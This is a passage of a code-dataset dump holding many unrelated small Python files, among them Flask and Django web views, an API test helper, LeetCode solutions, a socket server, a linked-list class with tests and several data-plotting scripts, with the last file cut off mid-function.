methods=['GET', 'POST'])\ndef teacher_delete(id):\n teacher = Teacher.query.get_or_404(id)\n if len(teacher.module_sessions) > 0 or len(teacher.teacher_attendances) > 0:\n flash(\"you can't delete this Teacher because it is in Relation with other Records\", 'alert-danger')\n if len(teacher.module_sessions) > 0:\n flash(\"you have to break the relation with the Module Sessions first\")\n if len(teacher.teacher_attendances) > 0:\n flash(\"you have to break the relation with the Teacher Attendances first\")\n return redirect(url_for('teacher_view', id=id))\n db.session.delete(teacher)\n db.session.commit()\n flash('Teacher: ' + str(teacher.name) + ' is deleted', 'alert-success')\n return redirect(url_for('teacher_index'))\n\n","sub_path":"app/routesBasicTables.py","file_name":"routesBasicTables.py","file_ext":"py","file_size_in_byte":31008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"545090527","text":"# _*_ coding : utf-8 _*-\n#作者jlx\n# @Time: 2020/5/18 19:51\n#@Email:1710770490@qq.com\n#@File:baseobject.py\n'''封装http请求'''\nfrom base_page.common import comm\nfrom base_page.logger import logger\nimport requests,json\n\n\nclass baseObject(comm):\n INDEX=0\n def __init__(self):\n self.initialize()\n def initialize(self):\n da = 
self.read_yaml() # get the base url\n self.url=da['api_url']['test_api']\n self.headers = {}\n def data_convert(self,data,files):\n if isinstance(data,dict):\n data = json.dumps(data)\n if files:\n data = json.loads(data)\n return data\n\n def file_convert(self,files):\n files = files[1:len(files)-1]\n # print(\"attributes:\",eval(files),type(files))\n return eval(files)\n def headers_init(self,headers,files):\n self.headers = {'Content-Type': 'application/json'}\n for key,value in headers.items():\n self.headers[key]=value\n if files:\n self.headers={}\n for key, value in headers.items():\n self.headers[key] = value\n def name_convert(self,name):\n if \"${{\" in name and \"}}\" in name:\n value = name.split(\"{{\")[1].split(\"}}\")[0]\n value = self.read_extract(value)\n name=name.split('$')[0] + value\n self.url = self.url+name\n else:\n self.url = self.url+name\n def post(self,data,files):\n res = requests.request('post',url=self.url,data=data,headers=self.headers,files=files)\n return res.json()\n def get(self,data,files):\n res = requests.request('get',url=self.url,data=data,headers=self.headers,files=files)\n return res.json()\n # pass extracted values along\n def sendinfo(self,data,res):\n if 'extract' in data and data['extract']: # if there is a field of variables to extract\n for key, value in data['extract'].items():\n extract = {}\n extract[key] = res[value]\n self.write_yaml(extract) # save into the yaml file\n # assertions\n def validate(self,yuqi,shiji):\n num = baseObject.INDEX\n for key,value in yuqi.items():\n if key in shiji:\n if value != shiji[key]:\n print(\"Case {3} judged as {2}!\\nReturned: {0} != expected: {1}\".format(shiji[key], value, False,num))\n assert shiji[key] == value, \"actual result does not match the expected result\"\n else:\n if isinstance(shiji,list):\n for data in shiji:\n logger.info(\"interface response: {0}\".format(data))\n yuqi_new = {}\n yuqi_new[key] = value\n self.validate(yuqi=yuqi_new, shiji=data)\n elif isinstance(shiji,dict):\n for _key,_value in shiji.items():\n if isinstance(_value,dict) and (key in _value):\n print(\"actual:\", _value)\n yuqi_new = {}\n yuqi_new[key]=value\n self.validate(yuqi=yuqi_new,shiji=_value)\n def base_info(self,mother,name,data=None,headers=None,files=None):\n if files:\n files = self.file_convert(files)\n if data:\n data = self.data_convert(data,files)\n if headers:\n self.headers_init(headers,files)\n if name:\n self.name_convert(name)\n res=''\n mother = mother.upper()\n if mother=='POST':\n res = self.post(data,files)\n elif mother=='GET':\n res = self.get(data,files)\n baseObject.INDEX += 1\n logger.info(\"-->>>starting test case {0}, interface url: {1}\".format(baseObject.INDEX, self.url))\n logger.info(\"interface request params: {0}\".format(data))\n logger.info(\"request headers: {1}, interface response: {0}\".format(res, headers))\n self.initialize()\n return res\n","sub_path":"jiekou_work/base_page/baseobject.py","file_name":"baseobject.py","file_ext":"py","file_size_in_byte":3984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"46961950","text":"from django.contrib import messages\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.urls import reverse_lazy\nfrom django.views import generic\n\nfrom .forms import DayCreateForm\nfrom .models import Day\n\n\n# Create your views here.\n\n\nclass IndexView(LoginRequiredMixin, generic.ListView):\n model = Day\n paginate_by = 8\n login_url = '/buybuy/signin/'\n\n def get_queryset(self):\n return Day.objects.filter(user=self.request.user)\n\n\nclass AddView(LoginRequiredMixin, generic.CreateView):\n model = Day\n form_class = DayCreateForm\n # fields = '__all__'\n 
login_url = '/buybuy/signin/'\n\n # for a simple form, form_class is unnecessary and this alone is ok\n # fields = '__all__'\n\n # redirect() is a function that returns an http response object\n # reverse_lazy() is a function that returns a string\n success_url = reverse_lazy('memoapp:index')\n\n def form_valid(self, form):\n messages.success(self.request, 'Your desire was added successfully')\n form.instance.user = self.request.user\n response = super().form_valid(form)\n return response\n\n\nclass UpdateView(LoginRequiredMixin, generic.UpdateView):\n model = Day\n form_class = DayCreateForm\n login_url = '/buybuy/signin/'\n success_url = reverse_lazy('memoapp:index')\n\n def form_valid(self, form):\n response = super().form_valid(form)\n messages.success(self.request, 'Your desire is updated')\n return response\n\n\nclass DeleteView(LoginRequiredMixin, generic.DeleteView):\n model = Day\n login_url = '/buybuy/signin/'\n success_url = reverse_lazy('memoapp:index')\n\n def delete(self, request, *args, **kwargs):\n response = super().delete(request, *args, **kwargs)\n messages.success(self.request, 'Deleted successfully')\n return response\n\n\nclass DetailView(LoginRequiredMixin, generic.DetailView):\n model = Day\n login_url = '/buybuy/signin/'\n\n\nclass SignUpView(generic.CreateView):\n form_class = UserCreationForm\n success_url = reverse_lazy('memoapp:signin')\n template_name = 'memoapp/signup.html'\n\n def post(self, request, *args, **kwargs):\n response = super().post(request, *args, **kwargs)\n messages.success(self.request, 'Your account was created successfully')\n return response\n\n\n# class ProfileView(generic.TemplateView):\n# model = User\n# template_name = 'memoapp/base.html'\n\n\n'''function\ndef index(request):\n context = {\n 'day_list': Day.objects.all(),\n }\n return render(request, 'memoapp/day_list.html', context)\n\n\ndef add(request):\n # context = {\n # 'form': DayCreateForm()\n # }\n # return render(request, 'memoapp/day_form.html', context)\n\n # build the form from the submitted data; an empty form unless this is a POST\n form = DayCreateForm(request.POST or None)\n\n # when method=POST, i.e. the submit button was pressed, and the input is valid\n if request.method == 'POST' and form.is_valid():\n form.save()\n return redirect('memoapp:index')\n\n # on a normal page access, or when the input has errors, show the page again\n context = {\n 'form': form\n }\n return render(request, 'memoapp/day_form.html', context)\n\n\ndef update(request, pk):\n # fetch the Day based on the pk in the url\n day = get_object_or_404(Day, pk=pk)\n\n # bind the fetched Day to the form\n form = DayCreateForm(request.POST or None, instance=day)\n\n # when method=POST, i.e. the submit button was pressed, and the input is valid\n if request.method == 'POST' and form.is_valid():\n form.save()\n return redirect('memoapp:index')\n\n # on a normal page access, or when the input has errors, show the page again\n context = {\n 'form': form\n }\n return render(request, 'memoapp/day_form.html', context) \n\ndef delete(request, pk):\n day = get_object_or_404(Day, pk=pk)\n\n if request.method == 'POST':\n day.delete()\n return redirect('memoapp:index')\n\n\n context = {\n 'day': day,\n }\n return render(request, 'memoapp/day_confirm_delete.html', context)\n\n\ndef detail(request, pk):\n day = get_object_or_404(Day, pk=pk)\n\n context = {\n 'day': day,\n }\n return render(request, 'memoapp/day_detail.html', context)\n\n'''\n","sub_path":"project/memoapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"70379142","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Mar 17 18:31:38 2020\r\n\r\n@author: BAI Haoyue\r\n\r\n\r\nQ53 Maximum Subarray\r\n\r\nGiven an integer array nums, find the contiguous subarray (containing at 
least one number) which has the largest sum and return its sum.\r\n\r\nPython3\r\n\"\"\"\r\n\r\nclass Solution:\r\n def maxSubArray(self, nums: List[int]) -> int:\r\n # init buf list with the same length of the list nums\r\n buf = [0] * len(nums)\r\n # assign the first value of nums to the first value of buf\r\n buf[0] = nums[0]\r\n \r\n for i in range(1, len(nums)):\r\n \r\n buf[i] = max(nums[i], nums[i] + buf[i-1])\r\n \r\n return max(buf)","sub_path":"code/Q53.py","file_name":"Q53.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"401547693","text":"# -*- encoding: utf-8 -*-\nimport argparse,os,sys,csv\n\ndef extracttweets(listtweets,date1,date2,fileout):\n #remove header\n listtweets.readline()\n for line in listtweets:\n date = float(line.strip().split(',')[0])\n if date < date1:\n continue\n elif date > date2:\n print('Finished treating file',listtweets.name)\n print(date,'>',date2)\n break\n else:\n fileout.write(line)\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-i','--input',\n type=argparse.FileType('r'),\n required=True,\n help=\"Input file [SORTED BY DATES]\")\n parser.add_argument('-d1','--date1',\n type=float,\n required=True,\n help=\"Epoch time, beginning of the period\")\n parser.add_argument('-d2','--date2',\n type=float,\n required=True,\n help=\"Epoch time, ending of the period\")\n parser.add_argument('-o','--output',\n type=argparse.FileType('w'),\n required=True,\n help=\"Output file,\")\n args = parser.parse_args()\n\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n extracttweets(args.input,args.date1,args.date2,args.output)\n\n args.input.close()\n args.output.close()\n\nif __name__ == '__main__':\n main()\n","sub_path":"version_20160401.dir/linkprediction.dir/preliminarystudy.dir/test_sim_june_month.dir/tweetcontent.dir/extract_usertweet_periods.py","file_name":"extract_usertweet_periods.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"359177031","text":"#! /usr/bin/env python\n\n# Copyright (c) 2015-2016 ARM Limited\n# SPDX-License-Identifier: Apache-2.0\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"This script reads the map file generated after the build process and prints\n memory layout information of an nRF51 application.\n USAGE: memory_info.py exec_filepath heap_warning_threshold\n\"\"\"\n\nimport sys\nimport os.path\nimport re\nimport subprocess\nfrom distutils import spawn\n\nARM_SIZE_UTILITY = 'arm-none-eabi-size'\nHEAP_SYMBOL = 'heap'\nSTACK_SYMBOL = 'stack'\nBSS_SYMBOL = 'bss'\nDATA_SYMBOL = 'data'\n\nfail_color = ''\nwarning_color = ''\n\n# If colorama is present, set the fail color to red\ntry:\n from colorama import init, deinit, Fore\n fail_color = Fore.RED\n warning_color = Fore.BLUE\nexcept:\n pass\n\ngeneric_pattern = '^(?P<useful_info>\\\\.(?P<section>{0})\\\\s+(?P<size>\\\\d+))\\\\s+\\\\d+$'\ncompiled_patterns = [re.compile('^(?P<useful_info>(?P<section>section)\\\\s+size)\\\\s+addr$'),\n re.compile(generic_pattern.format(DATA_SYMBOL)), re.compile(generic_pattern.format(BSS_SYMBOL)),\n re.compile(generic_pattern.format(HEAP_SYMBOL)), re.compile(generic_pattern.format(STACK_SYMBOL))]\n\ndef fail(message):\n print(fail_color + 'ERROR: ' + message)\n\n # If we've included ANSI color in output, reset the output style\n if fail_color:\n print(Fore.RESET)\n deinit()\n\n return 1\n\ndef warning(message):\n output = warning_color + 'WARNING: ' + message\n\n # If we've included ANSI color in output, reset the output style\n if warning_color:\n output += Fore.RESET\n deinit()\n\n return output\n\ndef main(arguments):\n # If using ANSI coloring is available, initialize colorama\n if fail_color and warning_color:\n init()\n\n # Ensure the right number of arguments are supplied\n if len(arguments) != 2:\n return fail('Improper use of memory_info.py.\\nUSAGE: memory_info.py exec_filepath heap_warning_threshold.')\n exec_filepath = arguments[0]\n warning_threshold = 0\n try:\n warning_threshold = int(arguments[1])\n if warning_threshold < 0:\n return fail('Second argument of memory_info.py must be a positive integer. Found \\'{0}\\'.'.format(arguments[1]))\n except ValueError:\n return fail('Second argument of memory_info.py must be a positive integer. Found \\'{0}\\'.'.format(arguments[1]))\n\n # Test if required utility exists\n if not spawn.find_executable(ARM_SIZE_UTILITY):\n print(warning('\\'{0}\\' could not be found. No memory usage information will be reported.'.format(ARM_SIZE_UTILITY)))\n return 0\n\n # Execute arm-none-eabi-size and get output\n process = subprocess.Popen([ARM_SIZE_UTILITY, '-A', exec_filepath], stdout=subprocess.PIPE)\n input = process.communicate()[0].strip()\n\n # Process output to remove memory addresses and print warnings when heap is low\n warnings_list = []\n print('Memory usage for \\'{0}\\''.format(exec_filepath))\n for line in input.split(os.linesep):\n for index, pattern in enumerate(compiled_patterns):\n match = re.match(pattern, line)\n if match:\n print(match.group('useful_info'))\n if match.group('section') == HEAP_SYMBOL and warning_threshold > int(match.group('size')):\n warnings_list.append(warning('Available heap < {0} bytes.'.format(warning_threshold)))\n break\n print(os.linesep.join(warnings_list))\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv[1:]))\n","sub_path":"nordic-nrf51822-gcc/scripts/memory_info.py","file_name":"memory_info.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"349188102","text":"from django.urls import path\nfrom .views import register, home, products, add_view, delete_view, edit_view, place_order\n\napp_name = 'seller'\n\nurlpatterns = [\n path('', home, name = 'home'),\n path('register/', register, name = 'register'),\n path('products/', products, name = 'products'),\n path('products/new', add_view, name = 'new-product'),\n path('products/<int:pk>/edit', edit_view, name = 'edit-product'),\n path('products/<int:pk>/delete', delete_view, name = 'delete-product'),\n path('placeorder/', place_order, name = 'place-order')\n]\n","sub_path":"sellers/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"523293316","text":"from socket import *\nfrom _thread import *\nimport json\n\n\nclass Server:\n def __init__(self, ip, anzahl):\n\n self.host = ip\n self.port = 40000\n\n 
self.sock = socket(AF_INET, SOCK_STREAM)\n\n self.sock.bind((self.host, self.port))\n\n self.sock.listen(anzahl + 1)\n\n self.conns = []\n self.players = []\n self.names = []\n while len(self.conns) < anzahl:\n conn, addr = self.sock.accept()\n self.conns.append(conn)\n\n for number, conn in enumerate(self.conns):\n conn.send('init'.encode())\n init = conn.recv(1024).decode()\n init = init.split(';')\n if init[0] == 'Spieler':\n self.players.append(conn)\n self.names.append(init[1])\n elif init[0] == 'Welt':\n self.world = conn\n print('All players connected.')\n for number, player in enumerate(self.players):\n start_new_thread(clientthread, (player, self.world, number,))\n data = [0, 0,\n ['start', [len(self.players)], {'%d' % number: '%s' % name for number, name in enumerate(self.names)}]]\n self.world.send(json.dumps(data).encode())\n\n\ndef clientthread(player, world, number):\n data = 'Player %d connected.\\n' % number\n player.send(data.encode())\n while True:\n # Receive request from instance Game\n data = player.recv(1024)\n # Check if message type is request.\n msg_type = json.loads(data)[1]\n\n if msg_type == 1:\n # Sends request to world.\n world.send(data)\n else:\n data = [3, 0, ['Error: not a valid request.', [], {}]]\n player.send(json.dumps(data).encode())\n\n # Receive response from World\n data = world.recv(1024)\n # Check if message type is response.\n msg_type = json.loads(data)[1]\n if msg_type == 1:\n # Sends response to player.\n player.send(data)\n else:\n data = [3, 0, ['Error: not a valid response.', [], {}]]\n player.send(json.dumps(data).encode())\n player.close()\n","sub_path":"Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"77762085","text":"from __future__ import print_function\nimport unittest\n\nclass linked_list:\n class node:\n def __init__ (self, value, next):\n self.value = value\n self.next = next\n\n # do not put in getters and setters as they are not needed\n\n def __init__(self, initial = None):\n # for extra credit, add in the elements of initial\n self.front = self.back = None\n\n def empty(self):\n return self.front == self.back == None\n\n def __iter__(self):\n self.current = self.front\n return self\n\n def __next__(self):\n if self.current:\n tmp = self.current.value\n self.current = self.current.next\n return tmp\n else:\n raise StopIteration()\n\n def __str__(self):\n pass\n\n def __repr__(self):\n # extra credit\n pass\n\n def push_front(self, value):\n old = self.front\n new = self.node(value, self.front)\n if self.empty():\n self.front = self.back = self.node(value, None)\n else:\n new.next = old\n self.front = new\n\n def push_back(self, value):\n new = self.node(value, None)\n if self.empty():\n self.push_front(value)\n else:\n self.back.next = new\n self.back = new\n\n def pop_front(self):\n if self.empty():\n raise RuntimeError\n elif self.front == self.back:\n new = self.front.value\n self.front = self.back = None\n return new\n else:\n new = self.front.value\n self.front = self.front.next\n return new\n\n def pop_back(self):\n if self.empty():\n raise RuntimeError\n elif self.front == self.back:\n new = self.front.value\n self.front = self.back = None\n return new\n else:\n sheesh = self.back.value\n new = self.front\n while new.next != self.back:\n new = new.next\n self.back = new\n new.next = None\n return sheesh\n\n\nclass test_linked_list (unittest.TestCase):\n def 
test_none(self):\n self.assertTrue(linked_list().empty())\n def test_pop_front_empty(self):\n self.assertRaises(RuntimeError, lambda: linked_list().pop_front())\n def test_pop_back_empty(self):\n self.assertRaises(RuntimeError, lambda: linked_list().pop_back())\n def test_push_back_pop_front(self):\n ll = linked_list()\n ll.push_back(1)\n ll.push_back(2)\n ll.push_back(3)\n self.assertFalse(ll.empty())\n self.assertEquals(ll.pop_front(), 1)\n self.assertEquals(ll.pop_front(), 2)\n self.assertEquals(ll.pop_front(), 3)\n self.assertTrue(ll.empty())\n def test_push_front_pop_front(self):\n ll = linked_list()\n ll.push_front(1)\n ll.push_front(2)\n ll.push_front(3)\n self.assertEquals(ll.pop_front(), 3)\n self.assertEquals(ll.pop_front(), 2)\n self.assertEquals(ll.pop_front(), 1)\n self.assertTrue(ll.empty())\n def test_push_front_pop_back(self):\n ll = linked_list()\n ll.push_front(1)\n ll.push_front(2)\n ll.push_front(3)\n self.assertFalse(ll.empty())\n self.assertEquals(ll.pop_back(), 1)\n self.assertEquals(ll.pop_back(), 2)\n self.assertEquals(ll.pop_back(), 3)\n self.assertTrue(ll.empty())\n def test_push_back_pop_back(self):\n ll = linked_list()\n ll.push_back(1)\n ll.push_back(\"foo\")\n ll.push_back([3,2,1])\n self.assertFalse(ll.empty())\n self.assertEquals(ll.pop_back(),[3,2,1])\n self.assertEquals(ll.pop_back(), \"foo\")\n self.assertEquals(ll.pop_back(), 1)\n self.assertTrue(ll.empty())\n\n\n","sub_path":"Assig 1/tutor/Tutoring.py","file_name":"Tutoring.py","file_ext":"py","file_size_in_byte":3834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"614545173","text":"import pafy\n\ndef get_audio(video):\n audio = video.getbestaudio()\n audio.download()\n\ndef get_playlist(link):\n playlist = pafy.get_playlist2(link)\n for video in playlist:\n get_audio(video)\n\ndef get_video(link):\n video = pafy.new(link)\n get_audio(video)\n\ndef main():\n link = input(\"Enter music video / playlist url: \")\n try:\n if \"playlist\" in link:\n get_playlist(link)\n else:\n get_video(link)\n print(\"\\n\")\n except:\n print(\"\\n\\nError downloading. Check that: link is valid, internet connection is available, and youtube-dl is up to date.\\n\\n\")\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"musicDownloader.py","file_name":"musicDownloader.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"621037856","text":"# -*- coding: utf-8 -*-\nimport os\nimport urllib\nfrom flask import Flask, render_template, make_response, abort, request\nfrom google.appengine.api import urlfetch\nimport cloudstorage as gcs\n\napp = Flask(__name__)\n# Note\n# How to install the packages:\n# pip install -t lib -r requirements.txt\n\nhostname = \"ichiwear.jp\"\nbucket_name = \"ichiwearjp.appspot.com\"\n\ndef is_dev():\n \"Returns True when running in development mode\"\n server_software = os.getenv('SERVER_SOFTWARE', '')\n if server_software.startswith(\"Development\"):\n return True\n else:\n return False\n\n@app.route(\"/\")\ndef index():\n \"Top page\"\n return render_template('index.html',\n version=1,station_id=0,hostname=hostname)\n\n@app.route(\"/<int:id>\")\ndef station(id):\n \"Individual station page\"\n if(id < 1):\n abort(404)\n return render_template('index.html',\n version=1,station_id=id,hostname=hostname)\n\n\n@app.route(\"/station/<int:id>\")\ndef station_json(id):\n try:\n gcs_file = gcs.open(\"/%s/json/%07d.json\" % (bucket_name,id))\n body = gcs_file.read()\n gcs_file.close()\n res = make_response(body)\n res.headers['Content-Type'] = 'application/json'\n res.headers['cache-control'] = 'public, max-age=3600'\n return res\n except gcs.errors.NotFoundError:\n # not-found case\n abort(404)\n\n@app.route(\"/twitter_card_image/<int:id>\")\ndef station_image(id):\n try:\n gcs_file = gcs.open(\"/%s/image/%07d.png\" % (bucket_name,id))\n body = gcs_file.read()\n gcs_file.close()\n res = make_response(body)\n res.headers['Content-Type'] = 'image/png'\n res.headers['cache-control'] = 'public, max-age=3600'\n return res\n except gcs.errors.NotFoundError:\n # not-found case\n abort(404)\n\n\n@app.route(\"/guide.html\")\ndef guide():\n return render_template('guide.html',version=1)\n\n@app.route(\"/privacy.html\")\ndef privacy():\n return render_template('privacy.html',version=1)\n\n@app.route(\"/upload/<path:path>\",methods=['POST'])\ndef setup(path):\n \"Uploads a file to gcs. Only usable on the local server\"\n # URL-decode the path\n path = urllib.unquote(path)\n if is_dev():\n # only usable on the local server\n filename = \"/%s/%s\" % (bucket_name,path)\n write_retry_params = gcs.RetryParams(backoff_factor=1.1)\n content_type = request.headers[\"Content-Type\"]\n gcs_file = gcs.open(filename,'w',content_type=content_type,retry_params=write_retry_params)\n gcs_file.write(request.data)\n gcs_file.close()\n return \"OK\"\n else:\n abort(404)\n\n@app.route(\"/twitter_card\")\ndef twitter_card():\n if is_dev():\n ruby = request.args.get('ruby','')\n name = request.args.get('name','')\n address = request.args.get('address','')\n return render_template('twitter_card.html',ruby=ruby,name=name,address=address)\n else:\n abort(404)\n\n@app.route(\"/w285ng\")\ndef test_twitter_card():\n \"Top page\"\n return render_template('test_twitter_card.html',hostname=hostname)\n","sub_path":"gae/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"330667477","text":"#this will label the largest community as colored. I'm using P14T3\n#slancast@scg4.stanford.edu:/srv/gsfs0/projects/snyder/slancast/repertoire/\n#Andrew is interested in plotting the largest community, too. 
I will do this with\n#the original formatting and with a new formatting just on that community, too.\n\nimport numpy as np\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport community\nimport pyparsing\nimport pickle\n\n'''\nfh=open(\"edgefiles/edgesstringP14T3.csv\", 'r')\nfg=fh.readlines()\nedges=[]\nG = nx.Graph()\nfor entry in fg:\n\tentry=entry.split(\",\")\n\tif len(entry) == 2:\n\t\tG.add_node(entry[0])\n\t\tG.add_node(entry[1].strip())\n\t\tG.add_edge(entry[0],entry[1].strip())\n\t\t\n\nnx.write_gml(G,\"P14T3.gml.gz\")\n'''\n\nG = nx.read_gml(\"P14T3.gml.gz\")\n\npartition = community.best_partition(G)\n\nwith open(\"P14T3communities.txt\", 'wb') as f:\n pickle.dump(partition, f)\n\nmost_common={}\nfor entry in partition.values():\n\tif entry in most_common:\n\t\tmost_common[entry] = most_common[entry]+1\n\telse:\n\t\tmost_common[entry] = 1\n\t\t\n#most_common_community = max(most_common, key=lambda key: most_common[key])\n#I am using the sorted function instead to give the second most common community too.\n\nmost_common_community=sorted(most_common, key=most_common.get, reverse=True)[0]\n\nsecond_most_common_community=sorted(most_common, key=most_common.get, reverse=True)[1]\n\nthird_most_common_community=sorted(most_common, key=most_common.get, reverse=True)[2]\n\nprint(most_common_community)\n\nprint(\"adding nodes\")\n\nlist_nodes = []\nfor entry in partition.keys() :\n if partition[entry] == most_common_community:\n \tlist_nodes.append(entry)\n \t\nsecond_list_nodes = []\nfor entry in partition.keys() :\n if partition[entry] == second_most_common_community:\n \tsecond_list_nodes.append(entry)\n \t\nthird_list_nodes = []\nfor entry in partition.keys() :\n if partition[entry] == third_most_common_community:\n \tthird_list_nodes.append(entry)\n\npos = pickle.load(open(\"P14T3graphLayout.txt\",\"rb\"))\n\n'''\npos = nx.fruchterman_reingold_layout(G)\n\n\nwith open(\"P14T3graphLayout.txt\", 'wb') as f:\n pickle.dump(pos, f)\n#saving layout for reuse.\n'''\n\n\n\nnx.draw_networkx_nodes(G, pos, node_shape=\".\", linewidths =0.0, node_color='black',node_size=0.1)\nnx.draw_networkx_nodes(G, pos, list_nodes, node_shape=\".\", linewidths =0.0, node_color='green',node_size=0.1)\nnx.draw_networkx_nodes(G, pos, second_list_nodes, node_shape=\".\", linewidths =0.0, node_color='blue',node_size=0.1)\nnx.draw_networkx_edges(G, pos, width=0.001)\n\nplt.savefig(\"./P14T3ColoredCommunitytwo.pdf\")\nplt.clf()\n\nnx.draw_networkx_nodes(G, pos, node_shape=\".\", linewidths =0.0, node_color='black',node_size=0.1)\nnx.draw_networkx_nodes(G, pos, list_nodes, node_shape=\".\", linewidths =0.0, node_color='green',node_size=0.1)\nnx.draw_networkx_nodes(G, pos, third_list_nodes, node_shape=\".\", linewidths =0.0, node_color='blue',node_size=0.1)\nnx.draw_networkx_edges(G, pos, width=0.001)\n\nplt.savefig(\"./P14T3ColoredCommunitythrid.pdf\")\nplt.clf()\n\nnx.draw_networkx_nodes(G, pos, node_shape=\".\", linewidths =0.0, node_color='black',node_size=0.1)\nnx.draw_networkx_nodes(G, pos, list_nodes, node_shape=\".\", linewidths =0.0, node_color='green',node_size=0.1)\nnx.draw_networkx_edges(G, pos, width=0.001)\n\nplt.savefig(\"./P14T3ColoredCommunityone.pdf\")\nplt.clf()\n\n\nH = G.subgraph(list_nodes)\nnx.draw_networkx_nodes(H, pos, node_shape=\".\", linewidths =0.0, node_color='green',node_size=2.5)\nnx.draw_networkx_edges(H, pos, width=0.001)\n\nplt.savefig(\"./P14T3Subgraph.pdf\")\nplt.clf()\n\n\nI = nx.node_connected_component(G,list_nodes[0])\nnx.draw_networkx_nodes(G, pos, 
node_shape=\".\", linewidths =0.0, node_color='black',node_size=0.1)\nnx.draw_networkx_nodes(G, pos, I, node_shape=\".\", linewidths =0.0, node_color='green',node_size=0.1)\nnx.draw_networkx_edges(G, pos, width=0.001)\n\nplt.savefig(\"./P14T3ConnectedCommunities.pdf\")\nplt.clf()\n\nI = nx.node_connected_component(G,second_list_nodes[0])\nnx.draw_networkx_nodes(G, pos, node_shape=\".\", linewidths =0.0, node_color='black',node_size=0.1)\nnx.draw_networkx_nodes(G, pos, I, node_shape=\".\", linewidths =0.0, node_color='blue',node_size=0.1)\nnx.draw_networkx_edges(G, pos, width=0.001)\n\nplt.savefig(\"./P14T3ConnectedCommunitiessecond.pdf\")\nplt.clf()\n\nI = nx.node_connected_component(G,third_list_nodes[0])\nnx.draw_networkx_nodes(G, pos, node_shape=\".\", linewidths =0.0, node_color='black',node_size=0.1)\nnx.draw_networkx_nodes(G, pos, I, node_shape=\".\", linewidths =0.0, node_color='blue',node_size=0.1)\nnx.draw_networkx_edges(G, pos, width=0.001)\n\nplt.savefig(\"./P14T3ConnectedCommunitiesthird.pdf\")\nplt.clf()\n\npos = nx.fruchterman_reingold_layout(H)\nnx.draw_networkx_nodes(H, pos, node_shape=\".\", linewidths =0.0, node_color='green',node_size=2.5)\nnx.draw_networkx_edges(H, pos, width=0.001)\n\nplt.savefig(\"./P14T3SubgraphNewLayout.pdf\")\nplt.clf()\n\n","sub_path":"networkxP14T3colored.py","file_name":"networkxP14T3colored.py","file_ext":"py","file_size_in_byte":4827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"646966816","text":"import plotly.express as px\r\nimport numpy as np\r\nimport csv\r\n\r\nwith open(\"coffee.csv\") as data_file:\r\n df = csv.DictReader(data_file)\r\n fig = px.scatter(df, x = \"Coffee in ml\", y = \"sleep in hours\", color = \"week\")\r\n fig.show()\r\n\r\ndef get_data_source(data_path):\r\n coffee = []\r\n sleep = []\r\n with open(data_path) as data_csv:\r\n bruh = csv.DictReader(data_csv)\r\n for row in bruh:\r\n coffee.append(float(row['Coffee in ml']))\r\n sleep.append(float(row['sleep in hours']))\r\n return {\"x\": coffee, \"y\": sleep}\r\n\r\ndef find_correlation(data_source):\r\n correlation = np.corrcoef(data_source[\"x\"], data_source[\"y\"])\r\n print(correlation[0,1])\r\n\r\ndef setup():\r\n data_path = \"coffee.csv\"\r\n data_source = get_data_source(data_path)\r\n find_correlation(data_source)\r\n\r\nsetup()","sub_path":"coffee.py","file_name":"coffee.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"267657254","text":"\"\"\"\nGiven an array A of positive lengths, return the largest perimeter of a triangle with non-zero area, formed from 3 of these lengths.\n\nIf it is impossible to form any triangle of non-zero area, return 0.\n\nExample 1:\n Input: [2,1,2]\n Output: 5\n\nExample 2:\n Input: [1,2,1]\n Output: 0\n\nExample 3:\n Input: [3,2,3,4]\n Output: 10\n\nExample 4:\n Input: [3,6,2,3]\n Output: 8\n\nNote:\n 3 <= A.length <= 10000\n 1 <= A[i] <= 10^6\n\"\"\"\n\ndef largestPerimeter(A):\n # sort the lengths list A\n A = sorted(A)\n longest_perimeter = 0\n # reversely iterate over the lengths list A\n for i in reversed(range(2, len(A))):\n # calculate the sum of the previous two nums\n sum = A[i - 2] + A[i - 1]\n 